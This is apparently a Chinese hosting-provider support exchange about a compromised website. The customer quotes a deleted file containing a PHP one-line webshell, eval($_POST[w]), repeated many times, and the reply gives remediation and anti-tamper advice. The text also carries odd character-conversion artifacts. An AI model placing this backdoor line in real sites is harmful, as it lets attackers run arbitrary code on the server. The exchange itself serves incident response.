問:前天服務(wù)器中的網(wǎng)站souluo360.cn數(shù)據(jù)庫的用戶名被人修改成aspnet,后面自己發(fā)現(xiàn)了又改回來,這是被入侵?jǐn)?shù)據(jù)庫造成的嗎?
在服務(wù)器中的網(wǎng)站souluo360.cn里面的plus文件中發(fā)現(xiàn)了一份文件,目前已經(jīng)刪除了,類型如下:,打開后是這樣:
<?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?>
請問這是什么東西,是別人上傳的一句話木馬嗎,服務(wù)器數(shù)據(jù)庫被修改同時被上傳了東西
答:您好,
1、您描述的的問題是站點(diǎn)被掛馬,站點(diǎn)被掛馬是程序漏洞導(dǎo)致,要徹底解決需要聯(lián)系程序商檢查并修復(fù)程序漏洞;
2、如果您已經(jīng)清理了掛馬,可以在服務(wù)器上安裝一個安全防護(hù)軟件比如“云鎖”,
云鎖有設(shè)置防篡改功能,可以將之前被掛馬的文件設(shè)置為防篡改,可以在一定程度避免再次被掛馬;不過防護(hù)軟件如果設(shè)置不當(dāng),也可能影響站點(diǎn)訪問,因此在防護(hù)軟件做設(shè)置時請您先閱讀下防護(hù)軟件的官方幫助文檔;查看該服務(wù)器為亞數(shù)機(jī)房服務(wù)器,如果安裝了云鎖防護(hù)軟件,需要將ip地址127.0.0.1、127.0.0.1、127.0.0.1加入云鎖的ip白名單中;非常感謝您長期對我司的支持!